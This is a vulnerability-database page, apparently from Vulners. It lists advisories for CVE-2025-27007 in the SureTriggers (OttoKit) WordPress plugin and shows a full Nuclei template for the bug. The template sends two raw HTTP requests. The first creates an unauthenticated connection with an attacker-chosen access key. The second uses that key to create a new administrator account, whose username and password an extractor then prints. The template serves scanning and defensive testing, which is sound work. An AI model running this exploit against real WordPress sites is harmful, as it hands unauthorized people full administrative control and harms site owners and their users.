| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| The vulnerability of the SureTriggers plugin of the WordPress content management system allows attackers to increase their privileges. | 13 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-27007 | 1 May 202511:14 | – | circl | |
| WordPress plugin SureTriggers 安全漏洞 | 1 May 202500:00 | – | cnnvd | |
| CVE-2025-27007 | 1 May 202510:54 | – | cve | |
| CVE-2025-27007 WordPress SureTriggers <= 1.0.82 - Privilege Escalation Vulnerability | 1 May 202510:54 | – | cvelist | |
| SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation | 9 May 202500:00 | – | exploitdb | |
| WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007) | 13 May 202518:49 | – | metasploit | |
| PrestaShop - SQL Injection to Eval Injection | 5 Jul 202603:01 | – | nuclei | |
| CVE-2025-27007 | 1 May 202511:15 | – | nvd | |
| WordPress SureTriggers Plugin < 1.0.83 Privilege Escalation Vulnerability | 15 May 202500:00 | – | openvas |
id: CVE-2025-27007
info:
name: OttoKit < 1.0.83 - SureTriggers allows Privilege Escalation
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Incorrect Privilege Assignment vulnerability in Brainstorm Force SureTriggers allows Privilege Escalation.This issue affects SureTriggers- from n/a through 1.0.82.
impact: |
Unauthenticated attackers can create unauthorized connections and escalate privileges to administrator through the SureTriggers REST API endpoints, gaining complete control over the WordPress site.
remediation: |
Upgrade to SureTriggers version 1.0.83 or later that implements proper privilege assignment checks.
reference:
- https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve
- https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2025-27007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-27007
cwe-id: CWE-266
epss-score: 0.5088
epss-percentile: 0.98792
metadata:
verified: true
max-request: 2
public-query: "/wp-content/plugins/suretriggers"
tags: cve,cve2025,ottokit,intrusive,priv,wordpress,wp-plugin,wp,suretriggers,vkev,vuln
variables:
username: "admin"
password: "{{randstr}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
access_key: "{{randbase(10)}}"
attacker: "{{randstr}}@{{rand_base(5)}}.com"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
User-Agent: OttoKit
{"sure-triggers-access-key": "{{access_key}}", "wp-password": "a", "connection_status": "ok", "wp-username": "{{username}}", "connected_email": "{{email}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'success'
- 'Connected successfully.'
internal: true
condition: and
- raw:
- |
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: {{Hostname}}
St-Authorization: Bearer {{access_key}}
Content-Type: application/x-www-form-urlencoded
selected_options[user_name]=new_{{username}}&selected_options[user_email]={{attacker}}&selected_options[password]={{password}}&selected_options[role]=administrator&integration=WordPress&type_event=create_user_if_not_exists&
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"administrator":true'
- '"success":true'
- "new_{{username}}"
condition: and
extractors:
- type: dsl
dsl:
- '"Username: new_" + username + " Password: " + password'
# digest: 4a0a004730450221008102b10b5bcff71b07a1593f0d6e0044bd25b4386d2139f2ceaae6f043223c7202207b3d9123e723001db76d197076b35a32b18bf0d3d24c3570d33291c8580b985b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation